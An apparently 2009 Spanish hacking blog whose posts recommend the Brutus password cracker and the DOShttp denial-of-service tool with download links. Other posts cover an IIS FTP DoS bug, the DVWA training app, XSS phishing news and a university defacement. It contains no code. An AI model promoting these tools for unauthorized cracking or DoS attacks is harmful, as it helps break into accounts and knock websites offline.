sábado 5 de septiembre de 2009

Cracking Tool: Brutus-aet2

esta tool es un poco antigua pero excelente para crackear contraseñas, tiene la funcion de crackear por fuerza Bruta, Ataques por Diccionario y mucho mas, permite crackear:


  • HTTP (Autentificación básica)
  • HTTP (HTML Form/CGI)
  • POP3
  • FTP
  • SMB
  • Telnet

Descarguen Aquí


Lo Recomiendo es de usar en momentos de que tenemos acceso a la puerta pero no podemos entrar....



Saludos
Dr.White

Tool de Encriptacion by Xoul-Net



Esta tool la he probado hoy de mañana y funciona bien, realmente la recomiendo...

* MD5
* RIPEMD-160
* SHA-1
* SHA-256
* SHA-384
* SHA-512
* HEX
* Base64


Descargalo de Aquí

Pass: http://www.x0ul-net.info/


Espero les guste...


1/2 fuente: Progenic...


Saludos
Dr.White

viernes 4 de septiembre de 2009

Bug en IIS 5.0 y 6.0

El FTPD de Microsoft IIS 5.0 y 6.0 tienen un bug en el cual se pueden hacer ataques Denial Of Service tan solo si tienes acceso a algún directorio, en la siguiente página se puede observar como con el usuario anonymous entra al directorio /pub/ y puede hacer la explotación de ese bug; todo sobre ese bug lo puedes encontrar en:

Este Link

¿Como funciona?

- No hay mucha ciencia, lo que hace es hacer un stack exhaustation para buggear el FTP y causar una especie de Buffer Overflow que produce un Denial Of Service....


Saludos
Dr.White

jueves 3 de septiembre de 2009

DVWA: Versión 1.0.5



DVWA ha liberado hoy una nueva versión de su producto la 1.0.5, esta viene con muchas mas...

Características de la nueva versión:

* Se re escribió completamente el codigo.
* Se rediseño completamente el aspecto de la aplicación.
* Se agrego la vulnerabilidad CSRF.
* Ahora las vulnerabilidades XSS se almacenan.
* Se agrego la vulnerabilidad Full Path Disclosure.
* Cuenta con un nuevo sistema de logueo.
* Ahora tiene manejo de secciones.
* Algunos bugs arreglados.
* Se implemento el PHPIDS.
* y muchas cosas mas…

Realmente espero les guste yo aun no la he probado en su totalidad de hecho ahora pare de probarla para compartirla con ustedes asi que los dejo con la descarga...

Descarga: DVWA

Caracteristicas by DragoN --> DragonJAR

Saludos
Dr.White

miércoles 2 de septiembre de 2009

Pen-Test & Tool: DOShttp

Esta tool es excelente para el testeo de Denial Of Service, sirve en la plataforma Windows 2000 hasta Vista... es muy dificil de que no le deniegue el servicio a ninguna web, es un fácil de usar y permite hasta la visualizacion de como va el ataque, la cantidad de sockets y a que web atacar, es muy buena.




Espero les sirva la tool yo la uso a veces para pen-test a algunos hosts, OJO solo sirve en algunos prefiero otras tools que funcionan en linux...

Link Arreglado:

Click Aquí

Mil Disculpas...

Saludos
Dr.White

martes 1 de septiembre de 2009

Phishing por pánico a la gripe A

Si ya tiempo atrás hablábamos de los potenciales riesgos de phising debido a la gripe porcina, existe una nueva posibilidad de un ataque de este tipo.

Lo que diferencia este ataque de los anteriores es que, además de enviar un email a un número indefinido de usuarios a los que engaña mediante un enlace a una página web que contiene código malicioso (phising), en este caso, se aprovecha una vulnerabilidad del tipo XSS (Cross-site Scripting) existente en el NHS (National Health Service) de Reino Unido (www.nhs.co.uk). Este organismo publica los tratamientos y dosis a seguir para combatir ciertas enfermedades. Si se aprovechara esta vulnerabilidad, podría llegar a engañar a los usuarios sobre las dosis de un tratamiento, mediante una página web que, por supuesto no está en los servidores del NHS británico.

El fallo ha sido descubierto por Phillip Clarke, director de una empresa de software que ha estado investigando en este tipo de vulnerabilidades en diferentes organizaciones, después de enterarse que han existido en los servidores web del MI5 y el Ministerio de Defensa Británico.

De momento no se han detectado campañas de mailings (spam) aprovechándose de este tipo de vulnerabilidad. Para tranquilidad de los lectores, las del NHS, han sido ya parcheadas, lo cual no quiere decir que no se puedan detectar este mismo tipo en otras entidades con funcionalidad similar y que se pueda reabrir la herida.

En el enlace de la noticia completa se puede además comprobar, cómo el descubridor de la vulnerabilidad del NHS, se intentó comunicar por activa y por pasiva con los webmasters de la organización sin éxito. Después publicó la vulnerabilidad en sla.ckers.org y al final fue redirigido a alguien de GovCertUK que ayudó a comunicar a Philip Clarke con los "sordos" webmasters de NHS de forma directa.

Esto me recuerda a un tema del que ya hablamos hace tiempo en SbD respecto al caso que hacían las empresas ante las notificaciones de descubrimientos de vulnerabilidades.


Fuente: SecurityByDefault

Saludos
Dr.White

Defacean la UTP?

Hoy investigando a que universidad iva a entrar di con que la UTP (Universidad Tecnológica del Perú) fue defaceada, que raro se supone que son una universidad de Tecnología...

Link de uno de los defaces: http://www.utp.edu.pe/al.aspx?idC=000057


Al parecer la UTP era vulnerable a Sql Injection en ASP.NET...


Aqui una imagen de lo que yo vi:






Saludos
Dr.White